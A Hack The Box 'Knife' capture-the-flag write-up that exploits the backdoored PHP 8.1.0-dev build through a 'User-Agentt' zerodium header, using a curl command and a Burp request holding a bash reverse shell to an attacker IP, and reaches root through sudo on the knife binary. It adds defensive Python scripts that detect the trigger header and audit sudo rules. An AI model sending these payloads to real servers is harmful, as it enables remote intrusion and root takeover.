Donald Ashdown

Hack the box - Knife

Updated: Apr 20



Summary

Knife is an extremely easy box that really shows the range of difficulty within the "easy" band of Hack The Box ratings. It caters to both beginners and the experienced: you can simply copy and paste a public CVE script for your initial foothold, or craft the request syntax yourself to make the exploit work.


Tools used
  • Autorecon

  • Linpeas

  • Whatweb


Processes/Techniques
  • Webshell hijacking

  • Command injection to code execution

  • Linpeas privilege escalation enumeration

  • SETUID

References


Enumeration

As usual we start off with a basic Nmap scan to see what we are working with, and initially our attack surface looks fairly narrow. As a result we run a second-stage scan to enumerate version information, with help from the Nmap Scripting Engine (NSE), using the following flags.


-sC - run the default NSE enumeration scripts

-sV - version detection



Our more in-depth Nmap scan shows the expected SSH service followed by an HTTP website identified by the title "Emergent Medical Idea"; this is fantastic information.

I noticed that port 1839 did not show up on the in-depth scan.


I ran a targeted scan specifying port 1839 with the -Pn flag, which skips host discovery (the ping probe) in case the firewall has a threshold trigger that, combined with the Nmap scripting engine, generates too much traffic. This was not the case, and we do not get any further information.


Enumeration AutoRecon

As always, I like to start AutoRecon in the background after my initial enumeration to pick up any bits and pieces I may have left behind. This can sometimes take up to 30 minutes, so we will check back later.


Enumeration HTTP

Browsing to port 80, we can see that this website most likely belongs to the medical field.


Directory Buster

I start off by running a directory buster in the background to look for hidden directories while I invest time actively enumerating the website. Unfortunately the directory search turns up nothing.


I was not able to click any of the sub-menus in the upper right corner, which was quite odd and suggested that the page was still under development.


Page inspection

I proceeded to check the page source, and other than some basic scripts and formatting there was nothing interesting.


Auto Recon

Let's check back on AutoRecon and see whether it picked up anything on port 80 that I perhaps missed with only a surface-level scan.

Browsing into the AutoRecon scans directory shows many reports we can review; we go straight to the whatweb results. If you don't already know it, whatweb is a very powerful website fingerprinting tool. The results are listed below.


WhatWeb report for http://10.129.216.29:80
Status    : 200 OK
Title     : Emergent Medical Idea
IP        : 10.129.216.29
Country   : RESERVED, ZZ

Summary   : PHP[8.1.0-dev], Apache[2.4.41], X-Powered-By[PHP/8.1.0-dev], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], Script

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and 
        maintain an open-source HTTP server for modern operating 
        systems including UNIX and Windows NT. The goal of this 
        project is to provide a secure, efficient and extensible 
        server that provides HTTP services in sync with the current 
        HTTP standards. 

        Version      : 2.4.41 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTML5 ]
        HTML version 5, detected by the doctype declaration 


[ HTTPServer ]
        HTTP server header string. This plugin also attempts to 
        identify the operating system from the server header. 

        OS           : Ubuntu Linux
        String       : Apache/2.4.41 (Ubuntu) (from server string)

[ PHP ]
        PHP is a widely-used general-purpose scripting language 
        that is especially suited for Web development and can be 
        embedded into HTML. This plugin identifies PHP errors, 
        modules and versions and extracts the local file path and 
        username if present. 

        Version      : 8.1.0-dev
        Google Dorks: (2)
        Website     : http://www.php.net/

[ Script ]
        This plugin detects instances of script HTML elements and 
        returns the script language/type. 


[ X-Powered-By ]
        X-Powered-By HTTP header 

        String       : PHP/8.1.0-dev (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Wed, 15 Sep 2021 01:58:40 GMT
        Server: Apache/2.4.41 (Ubuntu)
        X-Powered-By: PHP/8.1.0-dev
        Vary: Accept-Encoding
        Content-Encoding: gzip
        Content-Length: 2406
        Connection: close
        Content-Type: text/html; charset=UTF-8


Reviewing the output shows that the website runs on PHP, specifically version 8.1.0-dev. Let's take a closer look at this, as I believe it is an older version we are seeing here.


Enumeration - PHP version 8.1.0-dev

I came across a popular exploit on Exploit-DB. It is not straightforward and involves researching the exploit and tampering with the User-Agent header.


PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution


Here we work through the Exploit-DB and Packet Storm exploits, and after trying to manually execute system commands through the user agent we resort to the curl command.


CVE - Exploit DB

https://www.exploit-db.com/exploits/49933


CVE - PacketStorm

https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html


Code injection - curl

Eventually we solve this with the following curl command.

curl -i -H "User-Agentt: zerodiumsystem('id');" http://10.129.225.112/AAAA.php


Backdoor - Burpsuite

We also solve this by tinkering with the syntax in Burp Suite, which eventually works and provides the callback to our listener.


GET /aaa.php HTTP/1.1
Host: 10.129.225.112
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.44/6363 0>&1'");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


Our netcat listener catches the reverse shell.
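The two facts that made this foothold possible are both visible to a defender: the server announces PHP/8.1.0-dev in its X-Powered-By header (the development build that carried the backdoor planted in the php-src repository in March 2021), and the trigger is a request header named User-Agentt whose value starts with the zerodium string. The following Python script is an added example written for this post, not the author's tooling; it parses raw header blocks, reports what the server discloses about itself, and flags requests carrying the trigger. The response headers mirror the WhatWeb report above; the request sample is constructed from the curl request shown earlier.

```python
import re
from typing import Dict, List

# Response headers in the shape of the WhatWeb report above.
RESPONSE_HEADERS = """\
HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 01:58:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
"""

# Constructed request, modelled on the curl request in the write-up.
SAMPLE_REQUEST = """\
GET /AAAA.php HTTP/1.1
Host: 10.129.225.112
User-Agentt: zerodiumsystem('id');
Connection: close
"""


def parse_header_block(raw: str) -> Dict[str, str]:
    """Parse an HTTP header block into a dict keyed by lower-cased header name.
    The request/status line has no colon and is skipped."""
    headers: Dict[str, str] = {}
    for line in raw.splitlines():
        if ":" not in line:
            continue
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def fingerprint_findings(headers: Dict[str, str]) -> List[str]:
    """What a server reveals about itself, with the hardening directive for each."""
    findings: List[str] = []
    powered = headers.get("x-powered-by", "")
    if "php/8.1.0-dev" in powered.lower():
        findings.append("X-Powered-By advertises PHP/8.1.0-dev, the backdoored "
                        "development build; rebuild PHP from a clean release")
    if powered:
        findings.append("X-Powered-By discloses the PHP version; set expose_php = Off in php.ini")
    server = headers.get("server", "")
    if re.search(r"/\d", server):
        findings.append("Server header discloses a version; set ServerTokens Prod in Apache")
    return findings


def request_findings(headers: Dict[str, str]) -> List[str]:
    """Flag a request carrying the backdoor trigger: the misspelled User-Agentt
    header, or a zerodium-prefixed value in any header."""
    findings: List[str] = []
    for name, value in headers.items():
        if name == "user-agentt":
            findings.append("request carries a User-Agentt header (backdoor trigger)")
        if value.lower().startswith("zerodium"):
            findings.append(f"header {name} starts with the zerodium trigger string")
    return findings


if __name__ == "__main__":
    for finding in fingerprint_findings(parse_header_block(RESPONSE_HEADERS)):
        print("server:", finding)
    for finding in request_findings(parse_header_block(SAMPLE_REQUEST)):
        print("request:", finding)
```

Apache's default combined log format records User-Agent, not arbitrary headers, so the request check belongs in front of the application (a WAF rule or a reverse-proxy filter on the full header set), not in a log search after the fact; the fingerprint check can run against any stored response.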



Root

I am largely in the habit of uploading privilege escalation enumeration scripts such as linpeas; however, I always check for low-hanging fruit in the user's directory first. Running "sudo -l" we actually see a result, which is likely the path to root.


Sudo -l



Knife enumeration and GTFOBins

After tampering with the knife binary and failing to inject code or abuse the symbolic link, I eventually looked it up on GTFOBins, where I found the sudo abuse, and we made our way to root.


https://gtfobins.github.io/gtfobins/knife/
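The same "sudo -l" check the write-up uses as an attacker is worth running as an administrator. The script below is an added example written for this post, not the author's tooling: it parses the rule lines of sudo -l output, reports every command runnable as root, and highlights binaries whose GTFOBins sudo entry, like knife's, hands the caller a shell. The user name and the second rule in the sample are constructed; the only listed binary is knife, from this write-up, and an administrator would extend the list from their own review.

```python
import re
from typing import Dict, List

# Constructed `sudo -l` output in the format sudo prints. The user name and the
# service rule are invented for the example; the knife rule mirrors the write-up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webuser on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User webuser may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/sbin/service apache2 restart
"""

# Binaries whose GTFOBins sudo entry can give the caller a root shell. Only
# knife, cited in the write-up, is listed here; extend from your own review.
SHELL_ESCAPE_BINARIES = {"knife"}

# One sudo rule line: "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$"
)


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Return one dict per rule line: who the command runs as, whether a
    password is required, and the list of permitted commands."""
    rules: List[Dict[str, object]] = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and banners never start with "(runas)"
        runas_user = m.group("runas").split(":")[0].strip()  # "(root : ALL)" -> "root"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({"runas": runas_user, "nopasswd": "NOPASSWD" in tags, "commands": cmds})
    return rules


def classify(cmd: str) -> str:
    """Classify one permitted command for the audit report."""
    if cmd == "ALL":
        return "unrestricted"
    binary = cmd.split()[0].rsplit("/", 1)[-1]  # "/usr/bin/knife" -> "knife"
    if binary in SHELL_ESCAPE_BINARIES:
        return "known-shell-escape"
    return "review"  # not known-safe either; every root rule still needs a look


def audit_sudo_l(output: str) -> List[Dict[str, object]]:
    """Report every command runnable as root with its classification;
    rules whose target user is not root are skipped."""
    findings: List[Dict[str, object]] = []
    for rule in parse_sudo_l(output):
        if rule["runas"] not in ("root", "ALL"):
            continue
        for cmd in rule["commands"]:
            findings.append({"command": cmd, "nopasswd": rule["nopasswd"], "verdict": classify(cmd)})
    return findings


if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{f['verdict']:20} NOPASSWD={f['nopasswd']!s:5} {f['command']}")
```

The fix for a finding like the knife rule is not a narrower sudoers line (a tool that evaluates code or spawns a pager cannot be made safe by restricting its arguments) but removing root from the equation: run such tooling under a dedicated account that owns only what it needs.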


Root
